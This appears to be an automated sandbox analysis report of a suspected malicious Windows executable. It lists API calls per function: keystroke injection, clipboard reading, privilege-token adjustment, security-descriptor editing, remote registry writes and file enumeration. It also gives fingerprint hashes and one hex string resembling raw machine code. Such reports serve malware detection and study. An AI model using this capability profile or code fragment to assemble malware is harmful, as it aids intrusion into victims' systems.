                      • GetWindowLongW.USER32(FFFFFDD9,000000F0), ref: 00EFCED6
                      • SendMessageW.USER32(?,0000110A,00000009,00000000), ref: 00EFCF00
                      • SendMessageW.USER32 ref: 00EFCF29
                      • _wcsncpy.LIBCMT ref: 00EFCFA1
                      • GetKeyState.USER32(00000011), ref: 00EFCFC2
                      • GetKeyState.USER32(00000009), ref: 00EFCFCF
                      • SendMessageW.USER32(?,0000130B,00000000,00000000), ref: 00EFCFE5
                      • GetKeyState.USER32(00000010), ref: 00EFCFEF
                      • SendMessageW.USER32(?,0000110A,00000009,00000000), ref: 00EFD018
                      • SendMessageW.USER32 ref: 00EFD03F
                      • SendMessageW.USER32(?,00001030,?,00EFB602), ref: 00EFD145
                      • ImageList_SetDragCursorImage.COMCTL32(00000000,00000000,00000000,?,?,?), ref: 00EFD15B
                      • ImageList_BeginDrag.COMCTL32(00000000,000000F8,000000F0), ref: 00EFD16E
                      • SetCapture.USER32(?), ref: 00EFD177
                      • ClientToScreen.USER32(?,?), ref: 00EFD1DC
                      • ImageList_DragEnter.COMCTL32(00000000,?,?), ref: 00EFD1E9
                      • InvalidateRect.USER32(?,00000000,00000001,?,?,?), ref: 00EFD203
                      • ReleaseCapture.USER32 ref: 00EFD20E
                      • GetCursorPos.USER32(?), ref: 00EFD248
                      • ScreenToClient.USER32(?,?), ref: 00EFD255
                      • SendMessageW.USER32(?,00001012,00000000,?), ref: 00EFD2B1
                      • SendMessageW.USER32 ref: 00EFD2DF
                      • SendMessageW.USER32(?,00001111,00000000,?), ref: 00EFD31C
                      • SendMessageW.USER32 ref: 00EFD34B
                      • SendMessageW.USER32(?,0000110B,00000009,00000000), ref: 00EFD36C
                      • SendMessageW.USER32(?,0000110B,00000009,?), ref: 00EFD37B
                      • GetCursorPos.USER32(?), ref: 00EFD39B
                      • ScreenToClient.USER32(?,?), ref: 00EFD3A8
                      • GetParent.USER32(?), ref: 00EFD3C8
                      • SendMessageW.USER32(?,00001012,00000000,?), ref: 00EFD431
                      • SendMessageW.USER32 ref: 00EFD462
                      • ClientToScreen.USER32(?,?), ref: 00EFD4C0
                      • TrackPopupMenuEx.USER32(?,00000000,?,?,?,00000000), ref: 00EFD4F0
                      • SendMessageW.USER32(?,00001111,00000000,?), ref: 00EFD51A
                      • SendMessageW.USER32 ref: 00EFD53D
                      • ClientToScreen.USER32(?,?), ref: 00EFD58F
                      • TrackPopupMenuEx.USER32(?,00000080,?,?,?,00000000), ref: 00EFD5C3
                        • Part of subcall function 00E725DB: GetWindowLongW.USER32(?,000000EB), ref: 00E725EC
                      • GetWindowLongW.USER32(?,000000F0), ref: 00EFD65F
                      Strings
                      Memory Dump Source
                      • Source File: 00000000.00000002.1648445845.0000000000E71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E70000, based on PE: true
                      • Associated: 00000000.00000002.1648387143.0000000000E70000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1649380226.0000000000EFF000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1649380226.0000000000F25000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1650417999.0000000000F2F000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1654894457.0000000000F38000.00000002.00000001.01000000.00000003.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_e70000_7F7R8soxHM.jbxd
                      Similarity
                      • API ID: MessageSend$ClientScreen$ImageLongWindow$CursorDragList_State$CaptureMenuPopupTrack$BeginEnterInvalidateParentProcRectRelease_wcsncpy
                      • String ID: @GUI_DRAGID$F
                      • API String ID: 3977979337-4164748364
                      • Opcode ID: 0ea5d63b53b4e8c46a3add1ab36b503743afd40c7e0dbaa81d4da6c9a43acef4
                      • Instruction ID: e41f1ba0f6a21cb50ae367d4227e08ad0849353f0fb4905d04a61d5b0bad3d22
                      • Opcode Fuzzy Hash: 0ea5d63b53b4e8c46a3add1ab36b503743afd40c7e0dbaa81d4da6c9a43acef4
                      • Instruction Fuzzy Hash: 7C42BE34208249EFC721CF28C944ABABBE6FF88318F24551DF795E72A1C7319954DB92
                      APIs
                      • SendMessageW.USER32(?,00000400,00000000,00000000), ref: 00EF873F
                      Strings
                      Memory Dump Source
                      • Source File: 00000000.00000002.1648445845.0000000000E71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E70000, based on PE: true
                      • Associated: 00000000.00000002.1648387143.0000000000E70000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1649380226.0000000000EFF000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1649380226.0000000000F25000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1650417999.0000000000F2F000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1654894457.0000000000F38000.00000002.00000001.01000000.00000003.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_e70000_7F7R8soxHM.jbxd
                      Similarity
                      • API ID: MessageSend
                      • String ID: %d/%02d/%02d
                      • API String ID: 3850602802-328681919
                      • Opcode ID: 92e9b6d6e9a1523ef91128390ac8162424b91f6ec477ac890f4332d7d03ccd26
                      • Instruction ID: 9398fe6dec977e6771021a1600f4a7d201c9368c17588721315551a0d177c34e
                      • Opcode Fuzzy Hash: 92e9b6d6e9a1523ef91128390ac8162424b91f6ec477ac890f4332d7d03ccd26
                      • Instruction Fuzzy Hash: AC12CF71600208AFEB259F25CD49FBA7BB4EF85714F20A129FA15FA2E1DF708945CB50
                      APIs
                      Strings
                      Memory Dump Source
                      • Source File: 00000000.00000002.1648445845.0000000000E71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E70000, based on PE: true
                      • Associated: 00000000.00000002.1648387143.0000000000E70000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1649380226.0000000000EFF000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1649380226.0000000000F25000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1650417999.0000000000F2F000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1654894457.0000000000F38000.00000002.00000001.01000000.00000003.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_e70000_7F7R8soxHM.jbxd
                      Similarity
                      • API ID: _memmove$_memset
                      • String ID: DEFINE$Oa$Q\E$[:<:]]$[:>:]]$\b(?<=\w)$\b(?=\w)
                      • API String ID: 1357608183-2202602582
                      • Opcode ID: 13bb8b558f7bbe80e965ea1e56e3ff52b6cd6ece4682cb93c9945acfcced93a7
                      • Instruction ID: b3ac3811f2180078d5e50be5bf49e333ab54f583795be6c3a60c192f44920039
                      • Opcode Fuzzy Hash: 13bb8b558f7bbe80e965ea1e56e3ff52b6cd6ece4682cb93c9945acfcced93a7
                      • Instruction Fuzzy Hash: 6093A171A00215DBDB24DF68C981BEDB7B1FF48314F24916EE959BB290E7719E82CB40
                      APIs
                      • GetForegroundWindow.USER32(00000000,?), ref: 00E74A3D
                      • FindWindowW.USER32(Shell_TrayWnd,00000000), ref: 00EADA8E
                      • IsIconic.USER32(?), ref: 00EADA97
                      • ShowWindow.USER32(?,00000009), ref: 00EADAA4
                      • SetForegroundWindow.USER32(?), ref: 00EADAAE
                      • GetWindowThreadProcessId.USER32(00000000,00000000), ref: 00EADAC4
                      • GetCurrentThreadId.KERNEL32 ref: 00EADACB
                      • GetWindowThreadProcessId.USER32(?,00000000), ref: 00EADAD7
                      • AttachThreadInput.USER32(?,00000000,00000001), ref: 00EADAE8
                      • AttachThreadInput.USER32(?,00000000,00000001), ref: 00EADAF0
                      • AttachThreadInput.USER32(00000000,?,00000001), ref: 00EADAF8
                      • SetForegroundWindow.USER32(?), ref: 00EADAFB
                      • MapVirtualKeyW.USER32(00000012,00000000), ref: 00EADB10
                      • keybd_event.USER32(00000012,00000000), ref: 00EADB1B
                      • MapVirtualKeyW.USER32(00000012,00000000), ref: 00EADB25
                      • keybd_event.USER32(00000012,00000000), ref: 00EADB2A
                      • MapVirtualKeyW.USER32(00000012,00000000), ref: 00EADB33
                      • keybd_event.USER32(00000012,00000000), ref: 00EADB38
                      • MapVirtualKeyW.USER32(00000012,00000000), ref: 00EADB42
                      • keybd_event.USER32(00000012,00000000), ref: 00EADB47
                      • SetForegroundWindow.USER32(?), ref: 00EADB4A
                      • AttachThreadInput.USER32(?,?,00000000), ref: 00EADB71
                      Strings
                      Memory Dump Source
                      • Source File: 00000000.00000002.1648445845.0000000000E71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E70000, based on PE: true
                      • Associated: 00000000.00000002.1648387143.0000000000E70000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1649380226.0000000000EFF000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1649380226.0000000000F25000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1650417999.0000000000F2F000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1654894457.0000000000F38000.00000002.00000001.01000000.00000003.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_e70000_7F7R8soxHM.jbxd
                      Similarity
                      • API ID: Window$Thread$AttachForegroundInputVirtualkeybd_event$Process$CurrentFindIconicShow
                      • String ID: Shell_TrayWnd
                      • API String ID: 4125248594-2988720461
                      • Opcode ID: a44a17ffb747e6b8dd4b418a40815ec0ee227d858f208d79a5ad1639d9239997
                      • Instruction ID: a4d79d68a5dcc8cc0687976858f3d3be5a3f3610907c24bd549a36f563832894
                      • Opcode Fuzzy Hash: a44a17ffb747e6b8dd4b418a40815ec0ee227d858f208d79a5ad1639d9239997
                      • Instruction Fuzzy Hash: 8F317571A443187FEB206F629C49F7E7E6CEF88B50F114065FA05FA1D0CA705D10EAA0
                      APIs
                        • Part of subcall function 00EC8CC3: LookupPrivilegeValueW.ADVAPI32(00000000,00000000,00000004), ref: 00EC8D0D
                        • Part of subcall function 00EC8CC3: AdjustTokenPrivileges.ADVAPI32(?,00000000,00000000,?,00000000,?), ref: 00EC8D3A
                        • Part of subcall function 00EC8CC3: GetLastError.KERNEL32 ref: 00EC8D47
                      • _memset.LIBCMT ref: 00EC889B
                      • DuplicateTokenEx.ADVAPI32(?,00000000,00000000,00000002,00000001,?,?,?,?,00000001,?,?), ref: 00EC88ED
                      • CloseHandle.KERNEL32(?), ref: 00EC88FE
                      • OpenWindowStationW.USER32(winsta0,00000000,00060000), ref: 00EC8915
                      • GetProcessWindowStation.USER32 ref: 00EC892E
                      • SetProcessWindowStation.USER32(00000000), ref: 00EC8938
                      • OpenDesktopW.USER32(default,00000000,00000000,00060081), ref: 00EC8952
                        • Part of subcall function 00EC8713: AdjustTokenPrivileges.ADVAPI32(?,00000000,?,00000000,00000000,00000000,?,00EC8851), ref: 00EC8728
                        • Part of subcall function 00EC8713: CloseHandle.KERNEL32(?,?,00EC8851), ref: 00EC873A
                      Strings
                      Memory Dump Source
                      • Source File: 00000000.00000002.1648445845.0000000000E71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E70000, based on PE: true
                      • Associated: 00000000.00000002.1648387143.0000000000E70000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1649380226.0000000000EFF000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1649380226.0000000000F25000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1650417999.0000000000F2F000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1654894457.0000000000F38000.00000002.00000001.01000000.00000003.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_e70000_7F7R8soxHM.jbxd
                      Similarity
                      • API ID: StationTokenWindow$AdjustCloseHandleOpenPrivilegesProcess$DesktopDuplicateErrorLastLookupPrivilegeValue_memset
                      • String ID: $default$winsta0
                      • API String ID: 2063423040-1027155976
                      • Opcode ID: 97feefa47c1f1f42e10bedc4a4ebfed8c21bebaebedfee24f7e6287837bef63f
                      • Instruction ID: 9cf9b6ad2472bc29359a4c49333e586e38c5f545538e73571b705b95ab00229b
                      • Opcode Fuzzy Hash: 97feefa47c1f1f42e10bedc4a4ebfed8c21bebaebedfee24f7e6287837bef63f
                      • Instruction Fuzzy Hash: D5813E71900209AFDF11DFA4DF45EEEBBB8AF04308F08516AF924B6161DB328E15DB60
                      APIs
                      • OpenClipboard.USER32(00EFF910), ref: 00EE4284
                      • IsClipboardFormatAvailable.USER32(0000000D), ref: 00EE4292
                      • GetClipboardData.USER32(0000000D), ref: 00EE429A
                      • CloseClipboard.USER32 ref: 00EE42A6
                      • GlobalLock.KERNEL32(00000000), ref: 00EE42C2
                      • CloseClipboard.USER32 ref: 00EE42CC
                      • GlobalUnlock.KERNEL32(00000000,00000000), ref: 00EE42E1
                      • IsClipboardFormatAvailable.USER32(00000001), ref: 00EE42EE
                      • GetClipboardData.USER32(00000001), ref: 00EE42F6
                      • GlobalLock.KERNEL32(00000000), ref: 00EE4303
                      • GlobalUnlock.KERNEL32(00000000,00000000,?), ref: 00EE4337
                      • CloseClipboard.USER32 ref: 00EE4447
                      Memory Dump Source
                      • Source File: 00000000.00000002.1648445845.0000000000E71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E70000, based on PE: true
                      • Associated: 00000000.00000002.1648387143.0000000000E70000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1649380226.0000000000EFF000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1649380226.0000000000F25000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1650417999.0000000000F2F000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1654894457.0000000000F38000.00000002.00000001.01000000.00000003.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_e70000_7F7R8soxHM.jbxd
                      Similarity
                      • API ID: Clipboard$Global$Close$AvailableDataFormatLockUnlock$Open
                      • String ID:
                      • API String ID: 3222323430-0
                      • Opcode ID: 35d5664b9b157503dfbe077f520430c99a038f126020faec93fbd38b23a5f443
                      • Instruction ID: 0aed93331d85cd1b4b5949e09b7f2d6799af5ab82db8fd52ffec5ec2e6f6319c
                      • Opcode Fuzzy Hash: 35d5664b9b157503dfbe077f520430c99a038f126020faec93fbd38b23a5f443
                      • Instruction Fuzzy Hash: FE51807120424AAFD311AF62EC95F7E77A8AF84B00F105529F55AF21E1DF70D909CB62
                      APIs
                      • FindFirstFileW.KERNEL32(?,?), ref: 00EDC9F8
                      • FindClose.KERNEL32(00000000), ref: 00EDCA4C
                      • FileTimeToLocalFileTime.KERNEL32(?,?), ref: 00EDCA71
                      • FileTimeToLocalFileTime.KERNEL32(?,?), ref: 00EDCA88
                      • FileTimeToSystemTime.KERNEL32(?,?), ref: 00EDCAAF
                      • __swprintf.LIBCMT ref: 00EDCAFB
                      • __swprintf.LIBCMT ref: 00EDCB3E
                        • Part of subcall function 00E77F41: _memmove.LIBCMT ref: 00E77F82
                      • __swprintf.LIBCMT ref: 00EDCB92
                        • Part of subcall function 00E938D8: __woutput_l.LIBCMT ref: 00E93931
                      • __swprintf.LIBCMT ref: 00EDCBE0
                        • Part of subcall function 00E938D8: __flsbuf.LIBCMT ref: 00E93953
                        • Part of subcall function 00E938D8: __flsbuf.LIBCMT ref: 00E9396B
                      • __swprintf.LIBCMT ref: 00EDCC2F
                      • __swprintf.LIBCMT ref: 00EDCC7E
                      • __swprintf.LIBCMT ref: 00EDCCCD
                      Strings
                      Memory Dump Source
                      • Source File: 00000000.00000002.1648445845.0000000000E71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E70000, based on PE: true
                      • Associated: 00000000.00000002.1648387143.0000000000E70000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1649380226.0000000000EFF000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1649380226.0000000000F25000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1650417999.0000000000F2F000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1654894457.0000000000F38000.00000002.00000001.01000000.00000003.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_e70000_7F7R8soxHM.jbxd
                      Similarity
                      • API ID: __swprintf$FileTime$FindLocal__flsbuf$CloseFirstSystem__woutput_l_memmove
                      • String ID: %02d$%4d$%4d%02d%02d%02d%02d%02d
                      • API String ID: 3953360268-2428617273
                      • Opcode ID: 47fe528991b849885bd9c9e9260c1f866a2691eb7aa83f25754c84e759f31ebe
                      • Instruction ID: 84bb4eb12842f8eaa2c7150b76094f2a2e7f8d2a50ddc4166f6be945a7fe2c85
                      • Opcode Fuzzy Hash: 47fe528991b849885bd9c9e9260c1f866a2691eb7aa83f25754c84e759f31ebe
                      • Instruction Fuzzy Hash: F4A152B1508305ABC714EB64C885DAFB7ECFF94700F40592AF599E7192EB34DA09CB62
                      APIs
                      • FindFirstFileW.KERNEL32(?,?,74DE8FB0,?,00000000), ref: 00EDF221
                      • _wcscmp.LIBCMT ref: 00EDF236
                      • _wcscmp.LIBCMT ref: 00EDF24D
                      • GetFileAttributesW.KERNEL32(?), ref: 00EDF25F
                      • SetFileAttributesW.KERNEL32(?,?), ref: 00EDF279
                      • FindNextFileW.KERNEL32(00000000,?), ref: 00EDF291
                      • FindClose.KERNEL32(00000000), ref: 00EDF29C
                      • FindFirstFileW.KERNEL32(*.*,?), ref: 00EDF2B8
                      • _wcscmp.LIBCMT ref: 00EDF2DF
                      • _wcscmp.LIBCMT ref: 00EDF2F6
                      • SetCurrentDirectoryW.KERNEL32(?), ref: 00EDF308
                      • SetCurrentDirectoryW.KERNEL32(00F2A5A0), ref: 00EDF326
                      • FindNextFileW.KERNEL32(00000000,00000010), ref: 00EDF330
                      • FindClose.KERNEL32(00000000), ref: 00EDF33D
                      • FindClose.KERNEL32(00000000), ref: 00EDF34F
                      Strings
                      Memory Dump Source
                      • Source File: 00000000.00000002.1648445845.0000000000E71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E70000, based on PE: true
                      • Associated: 00000000.00000002.1648387143.0000000000E70000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1649380226.0000000000EFF000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1649380226.0000000000F25000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1650417999.0000000000F2F000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1654894457.0000000000F38000.00000002.00000001.01000000.00000003.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_e70000_7F7R8soxHM.jbxd
                      Similarity
                      • API ID: Find$File$_wcscmp$Close$AttributesCurrentDirectoryFirstNext
                      • String ID: *.*
                      • API String ID: 1803514871-438819550
                      • Opcode ID: a5d15d32ee4cbe2cc3a43ddfae91d5e7c9b2d8e78ed442c3513882c0e75ecbfc
                      • Instruction ID: 51f2437b359abcd89c923a3c0625b0dfef8cb10246e0c911d10f6ceca99f5ff1
                      • Opcode Fuzzy Hash: a5d15d32ee4cbe2cc3a43ddfae91d5e7c9b2d8e78ed442c3513882c0e75ecbfc
                      • Instruction Fuzzy Hash: 3731D0765002196FDF10DBB4EC89AEE73ACEF48324F145176E801F32A0EB30DA4ACA54
                      APIs
                      • RegConnectRegistryW.ADVAPI32(?,?,?), ref: 00EF0BDE
                      • RegCreateKeyExW.ADVAPI32(?,?,00000000,00EFF910,00000000,?,00000000,?,?), ref: 00EF0C4C
                      • RegCloseKey.ADVAPI32(00000000,00000001,00000000,00000000,00000000), ref: 00EF0C94
                      • RegSetValueExW.ADVAPI32(00000001,?,00000000,00000002,?), ref: 00EF0D1D
                      • RegCloseKey.ADVAPI32(?), ref: 00EF103D
                      • RegCloseKey.ADVAPI32(00000000), ref: 00EF104A
                      Strings
                      Memory Dump Source
                      • Source File: 00000000.00000002.1648445845.0000000000E71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E70000, based on PE: true
                      • Associated: 00000000.00000002.1648387143.0000000000E70000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1649380226.0000000000EFF000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1649380226.0000000000F25000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1650417999.0000000000F2F000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1654894457.0000000000F38000.00000002.00000001.01000000.00000003.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_e70000_7F7R8soxHM.jbxd
                      Similarity
                      • API ID: Close$ConnectCreateRegistryValue
                      • String ID: REG_BINARY$REG_DWORD$REG_EXPAND_SZ$REG_MULTI_SZ$REG_QWORD$REG_SZ
                      • API String ID: 536824911-966354055
                      • Opcode ID: f3796d660e81dd285dc73f3a5e9217d893885e82c2c7f9823d0e6b345e8334aa
                      • Instruction ID: c414547833f1b3a8b2ee23a20627959a034f67637e0bddd11a99f2cb8b278301
                      • Opcode Fuzzy Hash: f3796d660e81dd285dc73f3a5e9217d893885e82c2c7f9823d0e6b345e8334aa
                      • Instruction Fuzzy Hash: F2025D752006159FDB14EF25C895E2AB7E5FF88724F04985DF98AAB362CB30ED41CB81
                      APIs
                      • FindFirstFileW.KERNEL32(?,?,74DE8FB0,?,00000000), ref: 00EDF37E
                      • _wcscmp.LIBCMT ref: 00EDF393
                      • _wcscmp.LIBCMT ref: 00EDF3AA
                        • Part of subcall function 00ED45C1: CreateFileW.KERNEL32(?,40000000,00000001,00000000,00000003,02000080,00000000), ref: 00ED45DC
                      • FindNextFileW.KERNEL32(00000000,?), ref: 00EDF3D9
                      • FindClose.KERNEL32(00000000), ref: 00EDF3E4
                      • FindFirstFileW.KERNEL32(*.*,?), ref: 00EDF400
                      • _wcscmp.LIBCMT ref: 00EDF427
                      • _wcscmp.LIBCMT ref: 00EDF43E
                      • SetCurrentDirectoryW.KERNEL32(?), ref: 00EDF450
                      • SetCurrentDirectoryW.KERNEL32(00F2A5A0), ref: 00EDF46E
                      • FindNextFileW.KERNEL32(00000000,00000010), ref: 00EDF478
                      • FindClose.KERNEL32(00000000), ref: 00EDF485
                      • FindClose.KERNEL32(00000000), ref: 00EDF497
                      Strings
                      Memory Dump Source
                      • Source File: 00000000.00000002.1648445845.0000000000E71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E70000, based on PE: true
                      • Associated: 00000000.00000002.1648387143.0000000000E70000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1649380226.0000000000EFF000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1649380226.0000000000F25000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1650417999.0000000000F2F000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1654894457.0000000000F38000.00000002.00000001.01000000.00000003.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_e70000_7F7R8soxHM.jbxd
                      Similarity
                      • API ID: Find$File$_wcscmp$Close$CurrentDirectoryFirstNext$Create
                      • String ID: *.*
                      • API String ID: 1824444939-438819550
                      • Opcode ID: ad39e0d1c46428cfe55c27b92babc3d2ebf8a0289b96983ef8ddad085b8f9e2d
                      • Instruction ID: bcbdda5832d4e993654042a17c7bce0f89348b476afe5dbd102a77e36721b7ed
                      • Opcode Fuzzy Hash: ad39e0d1c46428cfe55c27b92babc3d2ebf8a0289b96983ef8ddad085b8f9e2d
                      • Instruction Fuzzy Hash: B631E5715012196FDF10DBB4EC89AEF77ACDF49324F141276E811B32A0EB30DA4ACA64
                      APIs
                        • Part of subcall function 00EC874A: GetUserObjectSecurity.USER32(?,00000004,?,00000000,?), ref: 00EC8766
                        • Part of subcall function 00EC874A: GetLastError.KERNEL32(?,00EC822A,?,?,?), ref: 00EC8770
                        • Part of subcall function 00EC874A: GetProcessHeap.KERNEL32(00000008,?,?,00EC822A,?,?,?), ref: 00EC877F
                        • Part of subcall function 00EC874A: HeapAlloc.KERNEL32(00000000,?,00EC822A,?,?,?), ref: 00EC8786
                        • Part of subcall function 00EC874A: GetUserObjectSecurity.USER32(?,00000004,00000000,?,?), ref: 00EC879D
                        • Part of subcall function 00EC87E7: GetProcessHeap.KERNEL32(00000008,00EC8240,00000000,00000000,?,00EC8240,?), ref: 00EC87F3
                        • Part of subcall function 00EC87E7: HeapAlloc.KERNEL32(00000000,?,00EC8240,?), ref: 00EC87FA
                        • Part of subcall function 00EC87E7: InitializeSecurityDescriptor.ADVAPI32(00000000,00000001,?,00EC8240,?), ref: 00EC880B
                      • GetSecurityDescriptorDacl.ADVAPI32(?,?,?,?), ref: 00EC825B
                      • _memset.LIBCMT ref: 00EC8270
                      • GetAclInformation.ADVAPI32(?,?,0000000C,00000002), ref: 00EC828F
                      • GetLengthSid.ADVAPI32(?), ref: 00EC82A0
                      • GetAce.ADVAPI32(?,00000000,?), ref: 00EC82DD
                      • AddAce.ADVAPI32(?,00000002,000000FF,?,?), ref: 00EC82F9
                      • GetLengthSid.ADVAPI32(?), ref: 00EC8316
                      • GetProcessHeap.KERNEL32(00000008,-00000008), ref: 00EC8325
                      • HeapAlloc.KERNEL32(00000000), ref: 00EC832C
                      • GetLengthSid.ADVAPI32(?,00000008,?), ref: 00EC834D
                      • CopySid.ADVAPI32(00000000), ref: 00EC8354
                      • AddAce.ADVAPI32(?,00000002,000000FF,00000000,?), ref: 00EC8385
                      • SetSecurityDescriptorDacl.ADVAPI32(?,00000001,?,00000000), ref: 00EC83AB
                      • SetUserObjectSecurity.USER32(?,00000004,?), ref: 00EC83BF
                      Memory Dump Source
                      • Source File: 00000000.00000002.1648445845.0000000000E71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E70000, based on PE: true
                      • Associated: 00000000.00000002.1648387143.0000000000E70000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1649380226.0000000000EFF000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1649380226.0000000000F25000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1650417999.0000000000F2F000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1654894457.0000000000F38000.00000002.00000001.01000000.00000003.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_e70000_7F7R8soxHM.jbxd
                      Similarity
                      • API ID: HeapSecurity$AllocDescriptorLengthObjectProcessUser$Dacl$CopyErrorInformationInitializeLast_memset
                      • String ID:
                      • API String ID: 3996160137-0
                      • Opcode ID: 3cff47b799200bec1c5a7f327d8da86dba54b156b0a0394f827123a6f6e0af66
                      • Instruction ID: c6d0c82632b49a761d0c5bc4cc1f4900ff84b5f9acc9003bc188734a07de8eb7
                      • Opcode Fuzzy Hash: 3cff47b799200bec1c5a7f327d8da86dba54b156b0a0394f827123a6f6e0af66
                      • Instruction Fuzzy Hash: E5612D71A00109BFDF109F95DF44EAEBBB9FF44704F149269E815B7251DB319A06CB60
                      Strings
                      Memory Dump Source
                      • Source File: 00000000.00000002.1648445845.0000000000E71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E70000, based on PE: true
                      • Associated: 00000000.00000002.1648387143.0000000000E70000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1649380226.0000000000EFF000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1649380226.0000000000F25000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1650417999.0000000000F2F000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1654894457.0000000000F38000.00000002.00000001.01000000.00000003.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_e70000_7F7R8soxHM.jbxd
                      Similarity
                      • API ID:
                      • String ID: 85ecfcffff506804010000ff9514ffffff8d4db8518d95ecfcffff528d85ecfcffff50ff9510ffffff6a0068800000006a036a006a0768000000808d8decfcffff$ANY)$ANYCRLF)$BSR_ANYCRLF)$BSR_UNICODE)$CR)$CRLF)$LF)$LIMIT_MATCH=$LIMIT_RECURSION=$NO_AUTO_POSSESS)$NO_START_OPT)$Oa$UCP)$UTF)$UTF16)
                      • API String ID: 0-2337862333
                      • Opcode ID: e772b1d9fd33731b66b173938019cfcc38f6cc5e97d887106ea752e776dfdc60
                      • Instruction ID: 799443bc8b2524544373ce199cd31c3b02ac9a0fc50c53f92ce960fad40d1abd
                      • Opcode Fuzzy Hash: e772b1d9fd33731b66b173938019cfcc38f6cc5e97d887106ea752e776dfdc60
                      • Instruction Fuzzy Hash: 25727F71E002199BDB14DF58C980BEEB7B5FF49314F1491AAE849FB281DB319D82CB90
                      APIs
